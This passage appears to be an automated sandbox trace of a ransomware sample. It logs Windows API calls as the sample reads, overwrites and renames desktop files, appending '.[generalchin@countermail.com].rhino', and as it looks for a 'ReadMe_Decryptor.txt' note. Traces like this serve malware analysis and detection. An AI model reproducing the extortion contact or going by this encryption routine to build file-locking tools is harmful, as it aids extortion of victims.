0x709f08 [0080.715] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0080.715] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0080.715] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0080.715] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0080.715] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0080.715] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0080.715] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0080.715] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0080.715] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0080.715] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0080.715] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0080.715] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0080.715] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0080.715] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0080.715] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0080.715] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0080.715] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0080.715] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0080.715] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0080.716] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75b0d8 [0080.716] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0080.716] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0080.716] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0d8 | out: hHeap=0x6d0000) returned 1 [0080.716] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x6ee498 [0080.716] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0080.716] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x6eee00 [0080.716] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0080.716] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6efc18 [0080.716] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eee00 | out: hHeap=0x6d0000) returned 1 [0080.716] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x715898 [0080.716] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6efc18 | out: hHeap=0x6d0000) returned 1 [0080.716] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x6ee498 [0080.716] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0080.720] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x715898 [0080.720] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0080.720] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x74e358 [0080.721] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0080.722] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x7630c0 [0080.725] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74e358 | out: hHeap=0x6d0000) returned 1 [0080.725] WriteFile (in: hFile=0x124, lpBuffer=0x7630e0*, nNumberOfBytesToWrite=0x9772, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x7630e0*, lpNumberOfBytesWritten=0x4af2ac*=0x9772, lpOverlapped=0x0) returned 1 [0080.725] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7630c0 | out: hHeap=0x6d0000) returned 1 [0080.725] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x9772, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0080.726] CloseHandle (hObject=0x124) returned 1 [0080.727] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fabf0 [0080.727] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x6f36d0 [0080.727] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fabf0 | out: hHeap=0x6d0000) returned 1 [0080.727] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mWLyWGy_QWFT.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mwlywgy_qwft.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mWLyWGy_QWFT.wav.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mwlywgy_qwft.wav.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0080.728] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0080.728] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0080.728] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0080.729] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0080.729] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0080.729] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0080.729] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0080.729] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0080.729] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0080.729] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0080.729] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nv6hON99.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nv6hon99.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0080.729] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x22de [0080.729] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x23fe, nNumberOfBytesToLockHigh=0x0) returned 1 [0080.729] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.730] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0080.731] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.732] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x22de, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x22de, lpOverlapped=0x0) returned 1 [0080.732] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0080.732] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0080.732] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0080.732] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0080.732] GetLastError () returned 0x0 [0080.732] SetLastError (dwErrCode=0x0) [0080.732] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0080.732] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2301) returned 0x6ee498 [0080.732] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0080.733] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0080.890] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0080.890] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0080.890] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.890] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0080.890] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0080.890] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0080.890] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0080.890] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0080.890] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0080.890] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0080.890] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0080.890] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0080.890] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714188 [0080.890] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0080.890] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714170 [0080.890] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0080.891] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0080.891] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0080.891] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0080.891] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0080.891] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0080.891] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0080.891] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0080.891] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0080.891] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0080.891] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0080.891] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0080.891] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0080.891] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0080.891] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0080.891] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0080.891] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0080.891] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0080.891] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0080.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0080.892] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0080.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75b0d8 [0080.892] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0080.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0080.892] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0d8 | out: hHeap=0x6d0000) returned 1 [0080.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x6f07a8 [0080.892] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0080.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x715898 [0080.892] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f07a8 | out: hHeap=0x6d0000) returned 1 [0080.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6f07a8 [0080.892] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0080.896] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x715898 [0080.897] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f07a8 | out: hHeap=0x6d0000) returned 1 [0080.897] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x744cd8 [0080.898] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0080.898] WriteFile (in: hFile=0x124, lpBuffer=0x744ce0*, nNumberOfBytesToWrite=0x23fe, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x744ce0*, lpNumberOfBytesWritten=0x4af2ac*=0x23fe, lpOverlapped=0x0) returned 1 [0080.898] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0080.898] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x23fe, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0080.898] CloseHandle (hObject=0x124) returned 1 [0080.899] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fabf0 [0080.900] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9730 [0080.900] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fabf0 | out: hHeap=0x6d0000) returned 1 [0080.900] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nv6hON99.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nv6hon99.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nv6hON99.gif.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nv6hon99.gif.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0080.901] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9730 | out: hHeap=0x6d0000) returned 1 [0080.901] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0080.901] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0080.901] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0080.901] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0080.901] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0080.901] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0080.901] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0080.901] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0080.901] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0080.901] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OiPhiPq EQyGt8pCeAoV.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oiphipq eqygt8pceaov.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0080.902] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x17515 [0080.902] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x17635, nNumberOfBytesToLockHigh=0x0) returned 1 [0080.902] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.902] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0080.904] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.904] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x17515, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x17515, lpOverlapped=0x0) returned 1 [0080.905] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0080.906] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0080.906] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0080.906] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0080.906] GetLastError () returned 0x0 [0080.906] SetLastError (dwErrCode=0x0) [0080.906] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0080.906] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x17538) returned 0x7630c0 [0080.911] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0080.911] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0080.911] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0080.911] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0080.911] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.911] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0080.911] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0080.911] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0080.911] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0080.911] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0080.911] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0080.911] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0080.911] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0080.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0080.912] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714170 [0080.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0080.912] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714188 [0080.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0080.912] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0080.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0080.912] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0080.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0080.912] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0080.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0080.912] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0080.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0080.912] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0080.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0080.912] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0080.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0080.912] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0080.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0080.913] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0080.913] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0080.913] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0080.913] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0080.913] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0080.913] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0080.913] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75b0d8 [0080.913] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0080.913] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0080.913] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0d8 | out: hHeap=0x6d0000) returned 1 [0080.913] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x6ee498 [0080.913] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0080.913] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x6eee00 [0080.913] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0080.913] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6efc18 [0080.913] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eee00 | out: hHeap=0x6d0000) returned 1 [0080.913] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x715898 [0080.913] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6efc18 | out: hHeap=0x6d0000) returned 1 [0080.914] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x6ee498 [0080.914] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0080.914] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x715898 [0080.914] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0080.914] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x744cd8 [0080.914] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0080.914] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x74b7b8 [0080.915] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: 